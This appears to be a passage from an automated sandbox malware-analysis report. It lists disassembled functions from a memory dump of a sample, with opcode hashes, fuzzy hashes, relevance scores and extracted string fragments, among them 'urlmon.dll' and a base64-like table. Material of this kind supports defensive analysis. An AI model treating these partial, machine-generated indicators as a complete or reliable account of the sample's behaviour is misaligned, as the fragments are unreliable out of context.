                                                                        • Opcode ID: 505073d373fed293753f1075f395e88528ba5a501556c1b0c0b3615492345e45
                                                                        • Instruction ID: d1d53fe700c0c9353fc5fe8acbb17088842e5552f5237c49a2e888ae81beffe6
                                                                        • Opcode Fuzzy Hash: 505073d373fed293753f1075f395e88528ba5a501556c1b0c0b3615492345e45
                                                                        • Instruction Fuzzy Hash: CD5193B2D01218AADB10EF94DD45AEEB378EF45710F1482ADE9086B240E7755B48CBE5
                                                                        Function 03645E8C Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$:=
                                                                        • API String ID: 0-750662103
                                                                        • Opcode ID: a0473d91f4fc6e2c4c296acc7f6b246b48083901680f092fbe47e9be50eb14f3
                                                                        • Instruction ID: a839aa200f0b38cd85da4587f905c75f4e64cc17f181a58a8550cc8d2f92ba96
                                                                        • Opcode Fuzzy Hash: a0473d91f4fc6e2c4c296acc7f6b246b48083901680f092fbe47e9be50eb14f3
                                                                        • Instruction Fuzzy Hash: 1111DDB6D0121CAF8B00DFA9D9419EEBBF9EF48210F14456EE919E7200E7719A148FA1
                                                                        Function 03644B4C Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: WQ
                                                                        • API String ID: 0-2823796750
                                                                        • Opcode ID: aa5cb307aa2f1666fc6b954bf4b1ed4507f4baf65be388509b4be938c3b7a5ba
                                                                        • Instruction ID: 1850ddcfa0b6705da181f67297aba8c3f78abdd66a823a52a2d621bb026372ad
                                                                        • Opcode Fuzzy Hash: aa5cb307aa2f1666fc6b954bf4b1ed4507f4baf65be388509b4be938c3b7a5ba
                                                                        • Instruction Fuzzy Hash: C62121B6D01218AFCB00DFA9D8419EFB7F9EF88210F14415EE915E7200E7705A04CFA0
                                                                        Function 03644ABC Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Da
                                                                        • API String ID: 0-4017735984
                                                                        • Opcode ID: 9316faa78856749fcaf6bf43c4998f636474b1239366db97d4bf601bf7e65dd3
                                                                        • Instruction ID: 397ba551934a40b078bc2297d3267a282ff3307f249ea3e35976e99eb36d11b9
                                                                        • Opcode Fuzzy Hash: 9316faa78856749fcaf6bf43c4998f636474b1239366db97d4bf601bf7e65dd3
                                                                        • Instruction Fuzzy Hash: E201D7B6C1121CAFDB40DFE9D941AEEBBF8AB08200F15466EE915F7240F77156048FA4
                                                                        Function 0362323D Relevance: .1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d064b72e35b1cd1e38eb7cd14a210dd2f882e34015aa9e7fbd5a42c2e7eacc7e
                                                                        • Instruction ID: 3c507fd93b92389925ed78ab4df6f08bfe3c33d7acb830c3489787a9815eb1ea
                                                                        • Opcode Fuzzy Hash: d064b72e35b1cd1e38eb7cd14a210dd2f882e34015aa9e7fbd5a42c2e7eacc7e
                                                                        • Instruction Fuzzy Hash: 1D413AB1D11229AFDB04CF99D881AEEBFB8EF49710F10415AFA14E7240D3B59645CFA4
                                                                        Function 0364823C Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5e03eb6ca3a957da7972dbef890000bea05db59c4736c4e0835a4d4c5dfe491
                                                                        • Instruction ID: 3b9dcafc5bf671127ccb0e1b20ac1b0dbf031e1db58bc8b33c0b2b95579b3e8b
                                                                        • Opcode Fuzzy Hash: f5e03eb6ca3a957da7972dbef890000bea05db59c4736c4e0835a4d4c5dfe491
                                                                        • Instruction Fuzzy Hash: B831A7B5A10648AFDB14DF99C880EEFB7F9EF89310F108219F919A7240D734A911CFA5
                                                                        Function 0364815C Relevance: .1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 195ff68caff478d4f81c18204550365703ddd76fc7baa3843e7ec858681f5af2
                                                                        • Instruction ID: 0e409b43544658907e1a70af3e17c0ffd4820f41294df5e68e0b54744936f994
                                                                        • Opcode Fuzzy Hash: 195ff68caff478d4f81c18204550365703ddd76fc7baa3843e7ec858681f5af2
                                                                        • Instruction Fuzzy Hash: 993108B5A00308ABDB14DF99C880EEF77F9EF88300F10811DF919AB240D734A911CBA5
                                                                        Function 03648ABC Relevance: .1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f286edb9c98afbac45e0d50cce7c2b7f53c149ef7fcf70f38db5057c69621668
                                                                        • Instruction ID: dff8ed1f9d79bceb97e60804bedc1b8b599f89e5c4490106d334cfbe1f703c5b
                                                                        • Opcode Fuzzy Hash: f286edb9c98afbac45e0d50cce7c2b7f53c149ef7fcf70f38db5057c69621668
                                                                        • Instruction Fuzzy Hash: C821F8B5A10308AFDB14DF58CC41EAF77B8EB89710F10850DF919AB240D770A915CBA5
                                                                        Function 0363761C Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f22a7485913c754e88b3638ab54363130d6058ceb7c495f7f90824dfc6d7cc86
                                                                        • Instruction ID: 8f86b61843d5566899d3f2379023c6927050bb2516607bcef7c0b58c526cefe5
                                                                        • Opcode Fuzzy Hash: f22a7485913c754e88b3638ab54363130d6058ceb7c495f7f90824dfc6d7cc86
                                                                        • Instruction Fuzzy Hash: 471173B67803057BF720DA558C42FAB776D9B85B50F244019FB08AF2C0D6B5B81547B8
                                                                        Function 03647F6C Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 66cebfcf569bb08c01f2c10370893a6fa022b3067b7c6a65e054c6aa117c0f58
                                                                        • Instruction ID: 846ba78a93084571098383e8a9e6ba132204817d887318df96ec03718f5724a9
                                                                        • Opcode Fuzzy Hash: 66cebfcf569bb08c01f2c10370893a6fa022b3067b7c6a65e054c6aa117c0f58
                                                                        • Instruction Fuzzy Hash: 711151B59403146FD710EB68CC45FAF77ECEB85710F00854DF9195B281D7706915CBA9
                                                                        Function 03647DEC Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba0a0f3c2f76b1e974ca5b04baa06825b65764f3ca799ec1bd60b06ded6b563f
                                                                        • Instruction ID: c4241056a70b8fa0aa303d8de511fd62250304116579a2d7a9a81c2581b75fa5
                                                                        • Opcode Fuzzy Hash: ba0a0f3c2f76b1e974ca5b04baa06825b65764f3ca799ec1bd60b06ded6b563f
                                                                        • Instruction Fuzzy Hash: 17115EB5A40315AFDB10EB68CC41FAB77ACEB85710F10854DFA196B280D7706916CBA9
                                                                        Function 03648E1C Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                                        • Instruction ID: 357d3e3301f396b250ab07a35ba81ce8d012e5fd9d7bb9d926f11fae4992e5d0
                                                                        • Opcode Fuzzy Hash: 11723e65f22c160cedb076eb235c544feb7ef4c0a24d84d0c297db9e7e4b7752
                                                                        • Instruction Fuzzy Hash: 0A01C0B2244608BBDB44DE99DC81EEB77EDAF8D710F018508BA0DE7240D630E8518BA4
                                                                        Function 03623390 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17194ab061cabc529ad172f649c44655517cd80de3817c0ed064bf7eca8c3ade
                                                                        • Instruction ID: a122bfcc67d4969adf90fdaf11deae75bf812874e4b34ab84ebe28791afb9418
                                                                        • Opcode Fuzzy Hash: 17194ab061cabc529ad172f649c44655517cd80de3817c0ed064bf7eca8c3ade
                                                                        • Instruction Fuzzy Hash: 4BF024776102262BD7009A6DAC40F8AFF9CEB85230F290226F91CC7341DB71E82587E0
                                                                        Function 0364806C Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52be92208fa957c59c635bc52c23d1b49fddf8a844ff1113085167805b8f9e1e
                                                                        • Instruction ID: 2a610a9ca9da9d51c511ee46c40f6a243e69201cc4ba6a51907f2f4df859bbe8
                                                                        • Opcode Fuzzy Hash: 52be92208fa957c59c635bc52c23d1b49fddf8a844ff1113085167805b8f9e1e
                                                                        • Instruction Fuzzy Hash: 54F01CB5610614BBDB10EF99DC81EDB77ACEF89710F008409B918AB241D670B9118BB4
                                                                        Function 0363773C Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                        • Instruction ID: 5e45ba4a97acb2437564a17a6565f0582c7555373e0af8d2ba11736733debbdb
                                                                        • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                        • Instruction Fuzzy Hash: 5BF08275C05208EBDB14CF64D841BDDBBB8EB04320F1043ADE8299B280E73497558B85
                                                                        Function 03648D3C Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                                        • Instruction ID: 5a4c3e2c60522a89e985e6b8e24f31f6d687b7f5bbf0fcd998988dfad5b2a7b3
                                                                        • Opcode Fuzzy Hash: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                                        • Instruction Fuzzy Hash: 9DE06D766447147BDA10EE59DC41F9B77ECDF85710F004019F908A7241D770B8118BB8
                                                                        Function 0364ABCC Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                                        • Instruction ID: 071a02c614d92e5a663ca529d3fdbd0147c98ac2d1bc44a0f0ee54864aed8d50
                                                                        • Opcode Fuzzy Hash: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                                        • Instruction Fuzzy Hash: 62E04F76A4121437C320A6CDDD06F97B76C8BC2A60F194068FE089F340E565AD0182E8
                                                                        Function 03648A1C Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                                        • Instruction ID: 7d2410aa08c20d45d18a6da7d3671f4b52edb110f40cc144444dc89d2fd14351
                                                                        • Opcode Fuzzy Hash: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                                        • Instruction Fuzzy Hash: 8EE04F756407147BD620FA59DC00E9B7BACDFC5720F518419FA1C6B141C6747915C7E4
                                                                        Function 0362A483 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6699b2647e3bf4cd0d9f671b7600112968d307164a2e66e84ed010ba73bb6902
                                                                        • Instruction ID: 48c514fe8c771df09f719354bdcb5a8a52cba7db8fe15cbed5380a50f89c6b0e
                                                                        • Opcode Fuzzy Hash: 6699b2647e3bf4cd0d9f671b7600112968d307164a2e66e84ed010ba73bb6902
                                                                        • Instruction Fuzzy Hash:

                                                                        Non-executed Functions

                                                                        Function 0363348E Relevance: 51.4, Strings: 41, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                        • API String ID: 0-3248090998
                                                                        • Opcode ID: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                                        • Instruction ID: e4f504cae3159b28e90931aa089696cbb21778f4e19d45b7f3e61060fa63e11f
                                                                        • Opcode Fuzzy Hash: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                                        • Instruction Fuzzy Hash: E59100F08042998ECB118F55A5603DFBF71BB96204F1581E9C6AA7B243C3BE4E85DF90
                                                                        Function 0364203C Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                        • API String ID: 0-1002149817
                                                                        • Opcode ID: 42b9f4e00552d7998826f413b796e1cdc611bfaff3b8131e4987ab83d8a3cf70
                                                                        • Instruction ID: 61abcd4c44fd19691289c110cb82e06fa8c0bf7f14fb5c693d0a57dc3f9c17af
                                                                        • Opcode Fuzzy Hash: 42b9f4e00552d7998826f413b796e1cdc611bfaff3b8131e4987ab83d8a3cf70
                                                                        • Instruction Fuzzy Hash: 38C12EB5C11328AADB61DFA4DD44BDEBBB8AF05304F1081DAD50CBB241E7B54A88CF65
                                                                        Function 0362994C Relevance: 33.9, Strings: 27, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "+$"3$0$3M$90$;$<$?y$A3$B$KK$\$^^$a?$b$gE$h$m)$n9$p>$pG$rj$uS$|~$/$]$m
                                                                        • API String ID: 0-1871129808
                                                                        • Opcode ID: 6f5d70e8a0bf28d8f3088fb4ea79454088ab5fcf0ed5798843d95562c0e517f9
                                                                        • Instruction ID: cbc069d1c9688a3d7a781815cf6abd72fbbcea0aa823d0a689ba26b400d4817d
                                                                        • Opcode Fuzzy Hash: 6f5d70e8a0bf28d8f3088fb4ea79454088ab5fcf0ed5798843d95562c0e517f9
                                                                        • Instruction Fuzzy Hash: BBA126B0C05669CBEB61CF41C9987CEBBB5BB05308F5085D9C5483B281CBBA1B89CF95
                                                                        Function 0363A61C Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                        • API String ID: 0-392141074
                                                                        • Opcode ID: 83d404f9d06bca929fa1fcf404f903674f664345cd3641426b3b1020bb13d96f
                                                                        • Instruction ID: b2031cda590fed61cc5c7e04c5771ac15a72804c56fa7ed632f63a378a41a020
                                                                        • Opcode Fuzzy Hash: 83d404f9d06bca929fa1fcf404f903674f664345cd3641426b3b1020bb13d96f
                                                                        • Instruction Fuzzy Hash: E1712EB5C50718AADB26EBE4CC40FEEB77DBF48701F04419DE518AA140EB715B488FA5
                                                                        Function 0362E203 Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                        • API String ID: 0-685823316
                                                                        • Opcode ID: a466c346cc4a16777437d9f339a8f4229519cb47871fb1c1223e42f9ebb64d18
                                                                        • Instruction ID: 7cf85f75dba6f85960d9b302cdaaa35ef5ea16e95418e4447dbb31a63f451657
                                                                        • Opcode Fuzzy Hash: a466c346cc4a16777437d9f339a8f4229519cb47871fb1c1223e42f9ebb64d18
                                                                        • Instruction Fuzzy Hash: CB3181B5D50318AAEF50DFE4CC44BEEBBB9BF08704F04425CE518BB180DBB516488BA8
                                                                        Function 036269DC Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2$B$F$G$N$O$]$j$w
                                                                        • API String ID: 0-1040731978
                                                                        • Opcode ID: 7210076507284f15942e4cf1ad312c589d45197e70ff81a55555d79cdec020c0
                                                                        • Instruction ID: 3de4716a4aac915a96226508add80d23c7d3e49e9c35e77035358e8a00cd7574
                                                                        • Opcode Fuzzy Hash: 7210076507284f15942e4cf1ad312c589d45197e70ff81a55555d79cdec020c0
                                                                        • Instruction Fuzzy Hash: D111DE60D1C7CAD9DB12C7BC84046AEBF715F13228F0882D9D5E42B2D2C2B94706DBA6
                                                                        Function 036356C7 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$P$e$i$m$o$r$x
                                                                        • API String ID: 0-620024284
                                                                        • Opcode ID: 8dc99e8969a681838e578b5bd6c0733433eee2398cc79a3174b6aabb256fe285
                                                                        • Instruction ID: 2aa09cdda43fccdf86a579f6901ace67f79381b863ffec1affd976a9943b262a
                                                                        • Opcode Fuzzy Hash: 8dc99e8969a681838e578b5bd6c0733433eee2398cc79a3174b6aabb256fe285
                                                                        • Instruction Fuzzy Hash: CF4193BAC10318BADB21EBA4DC40FDA7779AF45300F00859DA509AB140EBB49B488FA4
                                                                        Function 03622E36 Relevance: 10.1, Strings: 8, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$@MSJ$@MSJ$F[HQ$GM@U$S$WRWF$}
                                                                        • API String ID: 0-2245592833
                                                                        • Opcode ID: a9ceaada0cefef7e545ff48661fe9cc00ff8aadd23d3314ff585706100d8a8c6
                                                                        • Instruction ID: db00598a820bcea8e0383fad33c3b8caf8f261f25c328ea25cc32dff0f1ae95e
                                                                        • Opcode Fuzzy Hash: a9ceaada0cefef7e545ff48661fe9cc00ff8aadd23d3314ff585706100d8a8c6
                                                                        • Instruction Fuzzy Hash: 82310DB0D45298AACB14CFD0DA412EEBFB0EB05304F61855CC51ABF601D7769A52CF9A
                                                                        Function 0364289C Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L$S$\$a$c$e$l
                                                                        • API String ID: 0-3322591375
                                                                        • Opcode ID: e6ab931d446092fced8b124636bf90d359690adc171833196a9697c414dd6c59
                                                                        • Instruction ID: 82b482bba6a87403e7fde240f37e01cf86c318caff8c00ef5ed54ae1bdf7215f
                                                                        • Opcode Fuzzy Hash: e6ab931d446092fced8b124636bf90d359690adc171833196a9697c414dd6c59
                                                                        • Instruction Fuzzy Hash: 04419976C10218BACB50DFE5DC84BDFB7F9EF84301F15465EE909AB200D7B155448B94
                                                                        Function 0363A3CF Relevance: 7.7, Strings: 6, Instructions: 177COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: F$P$T$f$r$x
                                                                        • API String ID: 0-2523166886
                                                                        • Opcode ID: 76a3202e3da23e32ad658779fd99e1f96f74c36cdc3b7c2cb96ad32219d9077a
                                                                        • Instruction ID: aa1a8c360500179ed21784245cc4d54b37a81df9e01597019cd42a72cf0816a6
                                                                        • Opcode Fuzzy Hash: 76a3202e3da23e32ad658779fd99e1f96f74c36cdc3b7c2cb96ad32219d9077a
                                                                        • Instruction Fuzzy Hash: 5D51C171D44305EAEB25DFA4CD48BABF7F8EF16700F04465DE449AA280D3B4A588CFA5
